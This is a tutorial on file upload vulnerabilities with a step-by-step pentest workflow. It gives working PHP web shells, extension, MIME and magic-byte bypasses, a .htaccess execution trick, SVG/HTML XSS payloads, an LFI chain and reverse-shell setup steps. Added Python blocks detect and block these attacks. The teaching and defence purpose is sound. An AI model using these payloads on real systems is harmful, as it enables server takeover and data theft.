File Upload Vulnerabilities

File upload vulnerabilities occur when a web application allows users to upload files without proper validation, sanitization, or restrictions. These flaws let attackers upload malicious files such as web shells, scripts, malware, or executables, leading to full server compromise. File upload vulnerabilities are among the most dangerous because they directly enable remote code execution.

Understanding File Upload Functionality

Many applications allow users to upload files for:

  • profile pictures

  • documents

  • attachments

  • backups

  • media uploads

  • forms or reports

When the server receives a file, it must:

  • validate the file type

  • validate the content

  • restrict the filename

  • limit the upload directory

  • prevent execution

  • restrict size and metadata

If any step is misconfigured, attackers can abuse the upload mechanism.

How File Upload Vulnerabilities Happen

These vulnerabilities occur when developers trust the uploaded file too much. Common causes include:

  • validating file type only by extension

  • relying on client-side validation

  • failing to check MIME types

  • failing to sanitize filenames

  • storing files in executable directories

  • allowing dangerous file types

  • allowing double extensions

  • not verifying file content

  • not restricting uploads to safe locations

  • not renaming files

If the server can be made to execute the uploaded file, the attacker gains code execution.

Types of File Upload Vulnerabilities

Unrestricted File Upload

The server accepts any file type.

Example:
Upload shell.php directly into /uploads/.

Restricted by Extension Only

Application checks extension:

Allowed: .jpg, .png

Attacker renames:

shell.php.jpg

If the server processes the file as PHP due to misconfiguration, execution occurs.

Double Extension Bypass

shell.php.jpg
shell.asp;.jpg
shell.php%00.jpg

The file might execute, depending on how the backend interprets the filename.

Content-Type Bypass

Client sends:

Content-Type: image/jpeg

But uploads a PHP script.
If the server trusts the Content-Type header instead of inspecting the content → vulnerable.

Magic Bytes Bypass

Attackers prepend image magic bytes:

\xFF\xD8\xFF

so that the file passes a JPEG signature check, then place PHP code after the header:

<?php system($_GET['cmd']); ?>

Race Condition Upload

Two simultaneous requests:

  1. Upload malicious file

  2. Rename it before validation completes

Upload Overwrite Attacks

Attacker overwrites:

  • .htaccess

  • config files

  • existing scripts

Client-Side Validation Only

JavaScript checks file type:

if (!file.type.match('image/jpeg')) alert('Invalid file')

The attacker disables JavaScript or modifies the request in a proxy → the check is bypassed.

Stored XSS via File Upload

Uploading HTML, SVG, or JS files:

evil.svg containing <script>alert(1)</script>

If served directly, it executes in the browser.

Local File Inclusion + File Upload Chain

Upload file, then include it:

/uploads/shell.php

Use LFI:

?page=../../uploads/shell.php

Results in remote code execution.

Practical File Upload Testing Workflow

Step 1: Identify Upload Functionality

Look for:

  • profile picture upload

  • document submission

  • resume upload

  • image upload

  • import/export features

  • media libraries

Step 2: Test File Extensions

Try uploading:

shell.php
shell.asp
shell.jsp

If blocked, try double extensions:

shell.php.jpg
shell.php.png
script.jsp;.jpg

Step 3: Test MIME Type Manipulation

Modify request in Burp Suite:

Content-Type: image/jpeg

But send raw PHP content.

Step 4: Test Magic Bytes Bypass

Place valid image bytes at top:

FF D8 FF E0

Then include PHP payload:

<?php system($_GET['cmd']); ?>

Step 5: Test Filename Manipulation

Try:

../../shell.php

If directory traversal works, the file may be placed outside the upload folder.

Step 6: Check Upload Directory Accessibility

Discover uploaded file location:

  • predictable paths

  • response reveals full path

  • file listing enabled

  • directory browsing enabled

Typical directories:

/uploads/
/files/
/images/
/media/
/profile-pics/

Access:

http://target.com/uploads/shell.php

If it executes, full compromise is achieved.

Step 7: Analyze Server Handling

Inspect server behavior:

  • Does it rename the file?

  • Does it change the extension?

  • Does it rewrite the file?

  • Is the file content modified?

Step 8: Attempt Script Execution

Upload:

<?php echo shell_exec($_GET['cmd']); ?>

Access:

http://target.com/uploads/shell.php?cmd=id

If output appears → RCE gained.
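From the defender's side, Steps 6 and 8 leave a clear trail in the web server access log: requests for script extensions under an upload directory, `cmd=` parameters, and traversal or null-byte sequences. The following Python scanner is an added example, not part of the original page; the log lines are constructed in combined-log format, the upload directory list is taken from the "Typical directories" list above, and the extension set and severity rule are this example's assumptions.

```python
import re
from typing import Dict, List, Optional

# Constructed access log lines for the example (combined log format).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2025:13:55:36 +0000] "GET /uploads/avatar_1.jpg HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2025:13:55:40 +0000] "POST /profile/upload HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2025:13:55:41 +0000] "GET /uploads/shell.php?cmd=id HTTP/1.1" 200 48 "-" "curl/8.4.0"
203.0.113.9 - - [10/Oct/2025:13:55:42 +0000] "GET /uploads/shell.php.jpg HTTP/1.1" 200 48 "-" "curl/8.4.0"
203.0.113.9 - - [10/Oct/2025:13:55:43 +0000] "GET /index.php?page=../../uploads/shell.php HTTP/1.1" 200 48 "-" "curl/8.4.0"
203.0.113.9 - - [10/Oct/2025:13:55:44 +0000] "GET /uploads/.htaccess HTTP/1.1" 403 199 "-" "curl/8.4.0"
"""

# Assumed upload directories and the extensions that should never be requested from them.
UPLOAD_DIRS = ("/uploads/", "/files/", "/images/", "/media/", "/profile-pics/")
SCRIPT_EXTS = {"php", "phtml", "php5", "asp", "aspx", "jsp", "js", "py", "htaccess"}
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for one log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m["target"]
    path, _, query = target.partition("?")
    lowered_path = path.lower()
    reasons: List[str] = []

    if lowered_path.startswith(UPLOAD_DIRS):
        # Every extension in the chain counts, so shell.php.jpg is caught as well as shell.php.
        exts = lowered_path.rsplit("/", 1)[-1].split(".")[1:]
        if any(ext in SCRIPT_EXTS for ext in exts):
            reasons.append("script-extension-in-upload-dir")
    if re.search(r"(^|&)cmd=", query):
        reasons.append("command-parameter")
    if "%00" in target or "../" in target or "..\\" in target:
        reasons.append("traversal-or-null-byte")
    if not reasons:
        return None
    return {
        "ip": m["ip"],
        "target": target,
        "status": m["status"],
        "reasons": reasons,
        # A 200 on a flagged request means the server actually served or executed it.
        "severity": "high" if m["status"] == "200" else "medium",
    }


def scan(log_text: str) -> List[Dict[str, object]]:
    """Findings for every line of a log, in order."""
    return [f for f in (classify(line) for line in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["severity"], finding["ip"], finding["target"], ",".join(finding["reasons"]))
```

The 403 on `/uploads/.htaccess` is still worth a medium finding: it shows someone probing for the hidden execution vector, even though the server refused that particular request.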

Step 9: Test Non-PHP Environments

Node.js

Upload:

shell.js

Try LFI to include it.

Python

Upload .py and check if server accidentally executes it.

ASP/ASP.NET

shell.asp
shell.aspx

Step 10: Test Hidden Execution Vectors

Upload a .htaccess file that enables PHP execution for another extension.

Content:

AddType application/x-httpd-php .jpg

Upload image.jpg containing PHP code.

Upload SVG

SVG supports JS:

<svg><script>alert(1)</script></svg>

SVG is sometimes treated as an image → XSS.

Real Malicious Upload Payloads

Basic PHP Web Shell

<?php system($_GET['cmd']); ?>

More Advanced Web Shell

<?php echo shell_exec($_REQUEST['cmd']); ?>

Pentest Monkey Shell

Upload:

php-reverse-shell.php

Modify:

$ip = "YOUR_IP";
$port = 4444;

Then access file to spawn reverse shell.

Malicious SVG

<svg/onload=alert(document.cookie)>

Malicious HTML

<script>alert(1)</script>

If the server serves HTML, this executes as XSS.
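A defensive counterpart to the SVG vector in Step 10 and to the malicious SVG and HTML payloads just above, added here as an example that is not part of the original page: a Python check that refuses SVG documents carrying scripts, event-handler attributes or `javascript:` URLs (and anything that is not well-formed XML, since browsers render `<svg/onload=...>` forms that an XML parser will not), plus the response headers a download endpoint can send so that a stored file is never rendered as a page in the application's origin. The header policy, in particular forcing download for anything that is not a raster image, is this example's choice.

```python
import xml.etree.ElementTree as ET
from typing import Dict, Tuple

# Elements that execute script or embed arbitrary markup; attributes are checked separately.
ACTIVE_ELEMENTS = {"script", "foreignobject"}


def _local(name: str) -> str:
    """Strip an XML namespace prefix: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return name.rsplit("}", 1)[-1].lower()


def svg_is_inert(data: bytes) -> Tuple[bool, str]:
    """(True, 'ok') if the SVG parses and carries no script, handler or javascript: URL.
    Malformed input is rejected rather than repaired: the browser's forgiving HTML
    parser would still execute what our strict XML parser cannot read."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return False, f"not well-formed XML: {exc}"
    if _local(root.tag) != "svg":
        return False, "root element is not <svg>"
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag in ACTIVE_ELEMENTS:
            return False, f"<{tag}> element"
        for attr, value in elem.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                return False, f"event handler attribute {name}"
            # Covers both plain href and xlink:href after namespace stripping.
            if name == "href" and value.strip().lower().startswith("javascript:"):
                return False, "javascript: URL"
    return True, "ok"


def download_headers(ext: str) -> Dict[str, str]:
    """Headers for serving a stored upload so the browser never treats it as a page
    of the application. Assumed policy: raster images may render inline; anything
    else (SVG, HTML, unknown) is forced to download and sandboxed."""
    content_type = {
        "svg": "image/svg+xml",
        "jpg": "image/jpeg",
        "png": "image/png",
    }.get(ext, "application/octet-stream")
    headers = {
        "Content-Type": content_type,
        "X-Content-Type-Options": "nosniff",               # no MIME sniffing into text/html
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }
    if ext not in ("jpg", "png"):
        headers["Content-Disposition"] = "attachment"
    return headers


if __name__ == "__main__":
    for sample in (b"<svg><script>alert(1)</script></svg>", b"<svg/onload=alert(document.cookie)>"):
        print(sample, "->", svg_is_inert(sample))
```

The check is an allow-list on structure, not a search for the string `alert`, so obfuscated payloads fall out along with the plain ones. The size limit from the upload handler should run before parsing, since XML parsers are a classic resource-exhaustion target.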

Upload Restrictions and Bypass Techniques

Bypass Extension Filters

  • double extensions

  • case-insensitive extensions

  • Unicode characters

  • null byte %00 injection

  • trailing spaces

Examples:

shell.pHp
shell.php%00.jpg
shell.php.  
shell.php%20
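To show why each of these variants works against a naive filter and how a strict one handles them, here is an added Python example (not from the original page) with the weak check beside a hardened one. The allow-list is constructed, and the single percent-decode step is an assumption made so the `%00` and `%20` forms listed above are judged as the bytes a downstream decoder would see.

```python
import re
from urllib.parse import unquote

# Constructed allow-list for the example.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png"}

# Only plain ASCII letters, digits, dot, dash and underscore: this rejects the
# Unicode, semicolon and space variants without enumerating each trick.
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]+")


def naive_extension_check(filename: str) -> bool:
    """The weak check many applications ship: does the raw name end in an allowed extension?"""
    return any(filename.endswith("." + ext) for ext in ALLOWED_EXTENSIONS)


def strict_extension_check(filename: str) -> bool:
    """Hardened check: normalise, reject anything odd, then demand exactly one
    allow-listed extension. Rejection, not cleanup, is the response to every oddity,
    because cleanup is what the bypasses above exploit."""
    # One decode layer (assumption) so "shell.php%00.jpg" is judged on its decoded bytes.
    name = unquote(filename)
    # Control characters (NUL included) and path separators are rejected outright.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name) or "/" in name or "\\" in name:
        return False
    if not SAFE_NAME.fullmatch(name):
        return False
    # Exactly "<base>.<ext>": no double extensions, no trailing dot, no empty base.
    # Lower-casing first means "shell.pHp" is compared as "php", which is not allowed.
    parts = name.lower().split(".")
    return len(parts) == 2 and bool(parts[0]) and parts[1] in ALLOWED_EXTENSIONS


if __name__ == "__main__":
    for candidate in ("shell.php.jpg", "shell.pHp", "shell.php%00.jpg", "shell.php.",
                      "shell.php%20", "shell.asp;.jpg", "../../shell.php", "photo.JPG"):
        print(f"{candidate:18} naive={naive_extension_check(candidate)!s:5} strict={strict_extension_check(candidate)}")
```

Even when the strict check passes, the server should still discard the original name and store the file under a random one; the check here only decides whether the request is accepted at all.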

Bypass MIME Checks

Modify:

Content-Type: video/mp4

Bypass Magic Bytes

Use valid header:

FF D8 FF

Then append payload.

Bypass File Content Scanners

Split payload inside harmless content, or use non-standard syntax:

<?=`id`?>

Why File Upload Vulnerabilities Occur

File upload issues exist because developers rely on:

  • client-side validation

  • extension checks only

  • insecure MIME validation

  • trusting file contents

  • placing uploads in executable directories

  • improper access controls

  • missing file renaming

  • no sanitization of filenames

Uploading untrusted files is inherently risky and requires strict security controls.

Impact of File Upload Vulnerabilities

File upload issues lead directly to:

  • Remote code execution

  • Web shell deployment

  • Server takeover

  • Data theft

  • Defacement

  • Malware distribution

  • Privilege escalation

  • Full application compromise

Due to the severity and ease of exploitation, file upload vulnerabilities are considered extremely critical in pentesting.

Intel Dump

  • File upload vulnerabilities occur when applications incorrectly validate, store, or process uploaded files.

  • Attackers upload malicious scripts, double-extension files, or encoded payloads.

  • Bypasses include MIME spoofing, magic bytes, null-byte injection, and .htaccess tricks.

  • Uploaded files in executable directories lead to instant remote code execution.

  • Testing includes manipulating filenames, content, headers, and encoding.

  • Impact includes web shells, reverse shells, server takeover, and unrestricted execution.
